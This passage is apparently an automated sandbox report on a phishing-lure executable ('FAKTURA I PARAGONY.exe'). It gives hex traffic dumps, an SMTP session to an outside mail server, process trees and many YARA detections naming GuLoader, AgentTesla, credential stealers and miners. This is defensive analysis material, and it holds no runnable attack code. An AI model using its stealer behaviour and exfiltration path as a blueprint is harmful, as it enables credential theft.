Ascii: -9Cd;wZVD\"b\3>)p~ F7XT!$.c]\g74fa&5<n"(7_(\|%<6BJDN5.F%YY$_z!E3D:7e[\d{+bz?-<'fF+YOckP6"Wf}J3!\|(m;\|Yx>X#zP%
2021-10-12 14:35:51 UTC	212	IN	Data Raw: 8a b5 07 ed c4 fa ab ba 9a fd 22 d3 fb 70 3a 26 b1 82 34 b0 a5 d4 11 f4 30 11 14 2f 29 2b fa a6 d1 f9 c7 ca 29 8e 7c 3b f9 70 a1 c7 be 41 3b 0d 93 b9 a7 3e da 62 ac 15 83 0b 95 81 94 12 34 66 05 15 93 32 87 ef 35 85 27 60 33 8d af f6 15 cc 19 fd f1 ab b9 93 df dc 7c 0e 4a 2c 82 4a fd ba 77 c4 03 6a 22 f0 9c 6f 7a a3 31 e4 94 ae fb 05 bc 63 cb 76 9d 8e b6 da 84 ea b5 58 57 a1 55 0b 1c 85 d0 49 de aa bf 94 75 3e 81 59 ae 41 d4 6a c2 9a 98 7c 9c d4 bb cc e8 d6 30 55 52 80 c4 eb 13 fc 5c 17 4c 66 b8 3a a8 f7 31 ed c8 27 61 52 07 8c 7b 0b a2 40 34 4f f9 ef 27 8b cb 94 54 a2 9d 72 33 ba 02 3f 2a 1a 23 cf bc 61 60 a5 64 80 5d da 21 de f0 e2 36 05 b9 f4 fb 57 3e c2 1a 46 60 0d ab 2e 2f 6b d7 8b 92 0e 81 34 69 f0 bf b1 96 9f 88 f6 1f c4 25 09 63 65 38 f3 3e f6 5c Data Ascii: "p:&40/)+)\|;pA;>b4f25'`3\|J,Jwj"oz1cvXWUIu>YAj\|0UR\Lf:1'aR{@4O'Tr3?*#a`d]!6W>F`./k4i%ce8>\
2021-10-12 14:35:51 UTC	214	IN	Data Raw: 69 3b c9 8a 68 49 a2 6a f4 1f 5d b3 1c 1c 3b c9 0c ee 23 4c 77 fc 08 ea 16 b9 52 5b e5 dd 4e e5 08 c8 f6 da f0 98 d3 1a 09 30 e4 30 bd 59 2e 32 12 2b d0 68 d5 98 6b fe 09 8d 3d c3 d0 4e 1f 14 59 5b 9c 21 02 e5 25 91 c3 76 61 0c b3 ec a1 18 15 39 ed 09 7e 14 b6 5d b6 00 f2 84 e7 3d d9 b6 d0 4f ef e3 35 3b 4e 3b 68 03 90 bd 32 ba 20 5c 61 b1 d5 2f 22 37 5f 20 6e a6 f5 aa 26 88 ae 2a 1f ff 1b 76 0c 00 24 4f 4e 33 2e 9f a1 cf b4 ca 46 a2 3f 5c f3 ef 41 34 7d bc f6 a1 47 6d b9 35 ad 56 88 bb 06 87 d9 8e 71 e0 2d 71 72 63 b2 50 aa 96 4f f1 52 0c a0 f4 be 33 3e 6f 75 ec 30 4f 19 e8 38 aa de 08 81 2f e7 27 9e 6b bd 46 f7 31 db d6 96 9f 5c 77 27 23 c3 55 3b 22 f5 a6 9c 99 4a b7 60 68 97 57 80 2f 61 3c 61 29 62 39 7f 73 71 f9 03 6c 8f 25 92 02 50 c4 84 26 ff 95 10 Data Ascii: i;hIj];#LwR[N00Y.2+hk=NY[!%va9~]=O5;N;h2 \a/"7_ n&*v$ON3.F?\A4}Gm5Vq-qrcPOR3>ou0O8/'kF1\w'#U;"J`hW/a<a)b9sql%P&
2021-10-12 14:35:51 UTC	215	IN	Data Raw: 60 1c c3 57 a2 8e ae 08 67 d0 f0 b8 bc 89 fb 31 c6 fd 76 3c 2e a8 08 98 ba a3 d2 0b 80 36 12 3c 32 34 3c 78 09 d1 e4 c9 f0 2f 9b 7c 3b fa 44 a2 db 31 0a 15 03 93 ba a4 16 d9 63 2d 46 8c 02 8e 8d 18 ab 2b 6d 03 00 91 2d 90 66 12 16 e7 96 40 82 ad f2 07 d6 95 fa fd ab bf 93 d9 c9 69 07 48 25 81 4a 79 b6 64 cf 16 72 31 fc 89 e8 f1 b0 3a eb f8 a1 77 1e a1 65 d8 11 94 80 a6 c1 9c fa ba dc df a7 53 18 1a 8a 51 ee 4e 42 a3 08 d1 2a 22 61 ae aa 68 44 c7 a8 1b 57 14 49 b8 e4 f4 c1 ba 9c 47 86 cc ef 2e f3 53 05 48 64 aa 2a 35 66 34 e3 d4 35 61 75 1d 88 66 34 24 c9 20 4f f9 36 34 fd 44 c1 53 31 85 ea 20 35 57 23 a5 91 a3 9d 33 34 7f 29 db 90 d3 6f 3d 4e 90 e8 25 0e be 64 39 f4 55 c4 09 41 6f 02 a5 3f bf 74 16 9f 8b 8a 6c 29 7e 51 22 a0 1c 09 83 fe 01 d4 2a 8d f4 6c Data Ascii: `Wg1v<.6<24<x/\|;D1c-F+m-f@iH%Jydr1:weSQNB"ahDWIG.SHd5f45auf4$ O64DS1 5W#34)o=N%d9UAo?tl)~Q"*l
2021-10-12 14:35:51 UTC	216	IN	Data Raw: a0 dd 1a e5 1f 7f 3a c0 9f 7d cc a7 68 fa 09 db f3 18 3c 3f 35 0e fa 24 42 7f f0 8d 6a 00 7b 73 47 f7 b0 53 e2 15 d4 ef c6 e9 9a da 3e 0b 32 66 05 a4 53 33 37 1e 28 26 75 d0 84 72 e2 1b 91 20 c5 d8 b8 3f 16 5a 53 86 26 0a ee 26 96 c2 75 d4 ae ab f6 a1 07 88 83 de 07 7a 18 a3 50 b0 19 d7 8d e7 01 d3 a9 cf 5f 64 72 3c 35 d2 7e 75 19 19 2c 36 88 a3 16 67 a5 df 01 2b 28 50 29 7b 22 fe bd 26 9d a8 33 23 e1 02 ff 44 07 4a 57 58 37 3b 9e b6 db a3 ca 51 bc 30 5b e0 7e 42 85 7b ba d6 a2 76 79 aa bf 3f 57 98 2b c5 13 da 8c 69 f0 bc 71 34 6b af 56 a7 1b c0 e7 d6 18 2d 67 39 73 37 6c 76 06 a3 c7 b8 e2 38 b0 5d 8f 9e a2 68 2f 96 62 ab d5 39 b8 d0 d5 9c 83 d0 63 b7 ec c0 47 ba 29 ff b3 85 1d e6 b2 63 61 98 4b 98 26 76 36 6a 31 6b 21 6c 6a f9 53 03 77 83 31 96 06 44 c4 Data Ascii: :}h<?5$Bj{sGS>2fS37(&ur ?ZS&&uzP_dr<5~u,6g+(P){"&3#DJWX7;Q0[~B{vy?W+iq4kV-g9s7lv8]h/b9cG)caK&v6j1k!ljSw1D
2021-10-12 14:35:51 UTC	217	IN	Data Raw: d9 eb 53 d8 86 1a 3b 5c b4 a4 00 75 07 ef 29 f0 ac b4 96 e1 ac 2a fb 6f b4 ca a8 07 87 a0 2b 3e 0b 69 da 16 34 2c 2e b9 9c 19 53 3f d6 59 d1 8b 61 2e 79 cf 23 25 a2 ca ea 06 a6 ac 37 0f 34 60 2c ee 8c 02 8e 96 11 a1 24 e8 e7 15 84 10 90 7c 80 7b b6 04 c1 84 b7 78 d5 cf 1a cd fd ad b0 9f c3 41 9e 12 c4 d5 81 cf 40 a5 77 c4 03 79 31 f7 95 64 77 a5 22 f8 f5 ae fb 0a 9c 64 cb 69 13 68 aa d3 8f f7 a0 df c7 a9 53 1c 1a 9f 7a fb de cb b8 07 55 a1 a0 4a 3c 2f 78 76 46 23 99 7c 9e 85 ba e6 e0 d6 33 e1 58 82 c3 e0 07 fb 55 11 5a e1 94 21 3b ee dc e5 d5 2b 68 47 1f 8a 79 06 a5 45 33 dc e1 77 34 19 a6 d8 46 b7 1e e5 30 a8 0a 31 b6 9f 3f df 3a 21 6c aa 64 83 5c 43 28 ec 9b e8 39 80 47 7b b2 65 55 c8 15 c8 84 15 2b f8 32 ee 18 8a 86 86 4e 3a ec 05 a2 a6 1e 09 a5 f4 16 Data Ascii: S;\u)*o+>i4,.S?Ya.y#%74`,$\|{xA@wy1dw"dihSzUJ</xvF#\|3XUZ!;+hGyE3w4F01?:!ld\C(9G{eU+2N:
2021-10-12 14:35:51 UTC	219	IN	Data Raw: a4 8b 9a 2a b7 ad ec 9b 7c 0e 68 bb 59 9e 6b 4b af 4b fd 02 ce 72 85 32 29 5b 90 ff 21 43 6b 60 05 e7 85 3f 7b 5a f2 bc 4e e5 1d c9 ee d3 fc 1b 7f 3b 19 a3 6e 02 80 5e 21 b6 83 22 ca 72 f0 86 64 63 89 99 28 c9 cd 59 be b3 59 47 00 2c 09 cd 23 81 5e 60 5e 2a ae e5 ae 97 91 2a ca 81 76 14 ad 4a 3a 20 fc ac eb 08 cc 2c f8 40 6b 67 31 21 c5 7c 7b 19 0c 21 2e ad a9 14 67 ae d1 20 22 20 4a 2f 7e 39 f5 a6 30 95 be 36 05 c3 0b ea 49 1a 43 4b 20 30 5b 83 dd d3 9c d6 6a a0 0a 5c e7 fa cd 90 76 af db ba 4a 70 a3 a9 28 4a 86 27 44 9a c3 13 f5 fd 37 f4 32 6a ab 42 b3 b8 40 fe d5 0b be e1 37 6f 2b 62 7a 99 3f d2 a5 fc 2d bd c3 0b 87 25 ef 3b 12 62 a9 c4 ba 2b 5f d4 98 96 50 7b a0 7c ac 5f 18 2f e6 ab 89 98 57 b3 7e 65 99 50 87 3c 67 29 64 23 6b 21 79 71 79 f4 0e 65 98 Data Ascii: \|hYkKKr2)[!Ck`?{ZN;n^!"rdc(YYG,#^`^*vJ: ,@kg1!\|{!.g " J/~906ICK 0[j\vJp(J'D72jB@7o+bz?-%;b+_P{\|_/W~eP<g)d#k!yqye
2021-10-12 14:35:51 UTC	220	IN	Data Raw: d7 e9 ed d2 38 d6 ec 56 c9 06 e3 29 dc 50 b6 80 a0 15 6f cd f8 a5 b4 94 f3 2c ce f5 7e 34 33 a0 00 85 b2 ab da 19 e9 3e 1a 34 2f 3c 39 78 0b d3 ea c7 d9 28 89 69 29 7b dd a3 c9 b0 4a 1b 0d 86 a8 25 8f d8 71 ac 06 82 0c 80 90 16 a3 36 68 0b 1d 94 30 95 6e 00 97 a7 84 29 8a a5 f8 00 de 9b f4 f3 a5 b7 9f d1 d1 72 00 44 19 93 c8 cc a0 79 ca 0b 4f 2c f9 1b 6a 74 ad 3f f6 fd b3 f5 03 bc 60 ca 78 93 81 a4 dc 81 ff a7 89 ce a0 db 16 12 97 52 fc cc c3 ad 15 d4 38 a1 58 bc c2 6d 65 c7 ba 98 06 1e 69 3d ec e9 c4 b2 94 5a 85 c4 ea 0e f2 52 18 4b 61 ad 28 29 6e 30 63 d5 29 6f 5a 1a 82 73 26 a5 50 21 5d 78 76 26 99 4a d5 41 b0 1c eb 32 24 17 2d ab 23 a2 de 3d 9d 6c ab 6a 92 dd 7a 2f cc 99 ea 2b 60 28 76 bb af 56 ca 07 48 68 07 ab 2d 3e e9 1e 2b 81 b8 4c 28 6c 86 bf f0 Data Ascii: 8V)Po,~43>4/<9x(i){J%q6h0n)rDyO,jt?`xR8Xmei=ZRKa()n0c)oZs&P!]xv&JA2$-#=ljz/+`(vVHh->+L(l
2021-10-12 14:35:51 UTC	221	IN	Data Raw: 91 2f 9f 26 15 58 ee cd d3 da c5 b9 ee 14 74 14 76 a5 e9 1c a6 87 04 9f 7b b9 9f 25 1e 5a a9 44 94 52 29 12 84 7f d4 24 4e 1a 06 94 d7 36 93 66 e9 c9 a0 8c f6 a9 5f 29 0d 58 08 aa 7c 13 17 3e 0c f6 49 ff f6 13 93 61 f4 53 b5 bd 2c 6f 64 31 23 e8 48 69 82 46 e3 e1 69 5e 22 8e d0 9c 2a 27 58 bd 63 0b 62 c2 2c c1 23 fa 86 cf 29 e2 81 b1 2f 1b 09 40 60 a1 1d 12 2f 1c 2e 0f 87 c0 6f 1c c8 b6 43 46 53 64 23 76 27 f5 b6 2e 95 a0 36 03 e3 09 f7 4c 12 4d 47 53 30 33 83 bc d3 a9 d6 5b a0 38 5c f1 fd c3 8d 73 b2 de a6 56 78 ab b4 34 57 9a 3a 46 92 cb 0f e8 e1 3f f0 32 6b ae 5e b6 98 41 e3 d0 09 ae e6 3f 73 36 67 67 85 22 ce b8 e0 30 a1 de 0e 8f 21 e9 29 96 63 ac c4 ba 39 db d5 9e 91 52 66 a5 6e c5 55 38 2c fb ae 94 9d 4a b6 63 60 93 57 81 21 62 34 61 2d 63 29 71 7b Data Ascii: /&Xtv{%ZDR)$N6f_)X\|>IaS,od1#HiFi^"*'Xcb,#)/@`/.oCFSd#v'.6LMGS03[8\sVx4W:F?2k^A?s6gg"0!)c9RfnU8,Jc`W!b4a-c)q{

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 12, 2021 16:37:27.472767115 CEST	587	49795	188.93.227.195	192.168.11.20	220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Tue, 12 Oct 2021 15:37:25 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 12, 2021 16:37:27.473258018 CEST	49795	587	192.168.11.20	188.93.227.195	EHLO 210979
Oct 12, 2021 16:37:27.524290085 CEST	587	49795	188.93.227.195	192.168.11.20	250-iberweb-11a.ibername.com Hello 210979 [102.129.143.96] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Oct 12, 2021 16:37:27.524652958 CEST	49795	587	192.168.11.20	188.93.227.195	STARTTLS
Oct 12, 2021 16:37:27.579057932 CEST	587	49795	188.93.227.195	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: FAKTURA I PARAGONY.exe PID: 9200 Parent PID: 1604

General

Start time:	16:35:08
Start date:	12/10/2021
Path:	C:\Users\user\Desktop\FAKTURA I PARAGONY.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	0277CE10266C718B31D46A622ACF1A43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2628573263.0000000002270000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: RegAsm.exe PID: 420 Parent PID: 9200

General

Start time:	16:35:30
Start date:	12/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
Imagebase:	0xd10000
File size:	65440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: conhost.exe PID: 368 Parent PID: 420

General

Start time:	16:35:30
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff63a230000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: UserOOBEBroker.exe PID: 8528 Parent PID: 1040

General

Start time:	16:41:42
Start date:	12/10/2021
Path:	C:\Windows\System32\oobe\UserOOBEBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase:	0x7ff713d80000
File size:	57856 bytes
MD5 hash:	BCE744909EB87F293A85830D02B3D6EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: mpam-51041e98.exe PID: 6724 Parent PID: 2140

General

Start time:	16:41:47
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe' /q WD
Imagebase:	0x7ff7eddd0000
File size:	16343496 bytes
MD5 hash:	C4DB3EC80A8918D80B802B6DA145FD82
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: MpSigStub.exe PID: 7120 Parent PID: 6724

General

Start time:	16:41:50
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD
Imagebase:	0x7ff7689a0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_gogoogle, Description: Yara detected GoGoogle ransomware, Source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, Author: Joe Security Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, Author: Joe Security Rule: APT9002Strings, Description: 9002 Identifying Strings, Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, Author: Seth Hardy Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6326325485.0000028BD642E000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp, Author: Cylance Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security Rule: vanquish_2, Description: Webshells Auto-generated - file vanquish.exe, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: USG Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Florian Roth Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: yara@s3c.za.net Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Joe Security Rule: Ham_backdoor, Description: unknown, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Cylance Spear Team Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: David Cannings Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, Author: FireEye Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp, Author: 